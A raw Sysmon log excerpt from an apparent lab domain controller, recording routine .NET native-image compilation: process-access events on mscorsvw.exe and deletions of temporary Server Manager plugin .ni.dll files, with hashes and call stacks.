21:07:07.511{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9105-00000000CF01}1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.496{4DB9351A-A27B-60D3-9005-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M16JZ7OPHC\Microsoft.Windows.ServerManager.FaxServer.Plugin.ni.dll.auxMD5=AFE75210251B3ECE1BBB24DC1604F41B,SHA256=C430E96FD6229B2D7B24551215EECFDA742B22B1EF7ACB6C98FDB366782C9FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.496{4DB9351A-A27B-60D3-9005-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M16JZ7OPHC\Microsoft.Windows.ServerManager.FaxServer.Plugin.ni.dllMD5=53D0BCFC2AAA5BBBDE3ABFA9F7137DD0,SHA256=1B04B57F66B4F2A5E75A357345B0CFD1AF2AB015B3AA878126F4C9281798A34E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.480{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9005-00000000CF01}5544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9005-00000000CF01}5544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9005-00000000CF01}5544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-A27B-60D3-8F05-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MX3HBQT85P\Microsoft.Windows.ServerManager.DhcpServer.Plugin.ni.dll.auxMD5=6740D746585298B46956BFC3506712B4,SHA256=EA875E8A12398C1A1F1315FD11D5C0EE2877A627D6C8B68B73DC848A72C64A3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-A27B-60D3-8F05-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MX3HBQT85P\Microsoft.Windows.ServerManager.DhcpServer.Plugin.ni.dllMD5=470D9A27636C64E4FB047B3673B3CE2E,SHA256=75C95A950D536116C3EAA944BF4E4C1B948867B29B080725010617619E0C8D5B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.433{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-8F05-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.402{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-8F05-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.402{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-8F05-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.402{4DB9351A-A27B-60D3-8E05-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJ87XTHC0G\Microsoft.Windows.ServerManager.Deployment.Extension.ni.dll.auxMD5=94B5BBF7F85889B1393DBD126F659EBC,SHA256=B8A6308B8B8BBA87751AE705C260956C5D35EC466D188B50B8377F37381F5F47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.386{4DB9351A-A27B-60D3-8E05-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJ87XTHC0G\Microsoft.Windows.ServerManager.Deployment.Extension.ni.dllMD5=62997B1A2B3351A5607BE64445B6A61F,SHA256=FA62908137DBA9BDB03B419B172A5E83C301E57451194A257D52CF36EBA3AFC4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
ft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.496{4DB9351A-A27C-60D3-9A05-00000000CF01}3356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YYIKRJJOQG\Microsoft.Windows.VolumeActivation.Plugin.ni.dll.auxMD5=156838D093600CD6EA5FF943541C241B,SHA256=5A8402F24B908B3C59D701C0CA0A7C10A934D7FE79AA38A1FFAD5EA9B876B139,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.496{4DB9351A-A27C-60D3-9A05-00000000CF01}3356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YYIKRJJOQG\Microsoft.Windows.VolumeActivation.Plugin.ni.dllMD5=B2199A050FBC5CDFCEFE25D60E90C952,SHA256=914C9818BAAC7578B7CCEE600A59A9E9A566E99CE6028C625A09514ECCF52B90,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.480{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9A05-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.464{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9A05-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.464{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9A05-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.449{4DB9351A-A27C-60D3-9905-00000000CF01}5240NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRFKX0QXW4\Microsoft.Windows.ServerManager.ServerComponentManager.ni.dll.auxMD5=BC3CB15FF075C649A0EBE1C6C72C3B2B,SHA256=7B514EC5AC4E5334B207339206555AD20A6273A85696B800CCEB46C9E68FC585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.449{4DB9351A-A27C-60D3-9905-00000000CF01}5240NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRFKX0QXW4\Microsoft.Windows.ServerManager.ServerComponentManager.ni.dllMD5=CB2FF83EA072C52DA777A5A9298D5EC4,SHA256=577011EDAC836C38B6C2180AB03BBB0235E4C78ADC835842C6ABE78698FD27E6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:08.433{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9905-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.402{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9905-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:08.402{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9905-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.402{4DB9351A-A27C-60D3-9805-00000000CF01}5624NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MFED4NLRI1\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard.ni.dll.auxMD5=0B1527DD1574E2038222A6F553B3426E,SHA256=EB619300F854D8506F6D5934138E402ECB1378BF477243C3E8912050A16ED859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.402{4DB9351A-A27C-60D3-9805-00000000CF01}5624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MFED4NLRI1\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard.ni.dllMD5=9DCE5EAB1FC5080E651358D55CF9BD5C,SHA256=B0B2B17184A01A4A4A6B3A94C461A2284FEA573CE7C7C0EC7164DE4CD916F9E8,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.339{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9805-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:08.324{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9805-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.324{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9805-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000023282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.324{4DB9351A-A27C-60D3-9705-00000000CF01}7128NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GNXQMK8O2T\Microsoft.Windows.ServerManager.RemoteAccess.Plugin.ni.dll.auxMD5=51B70DA819B6EF9AB5198CE129524191,SHA256=F2438EC26B05D6BAA643A86AEF5C67E152E8268450ED3F24EAEE7128AE8FF625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.308{4DB9351A-A27C-60D3-9705-00000000CF01}7128NT 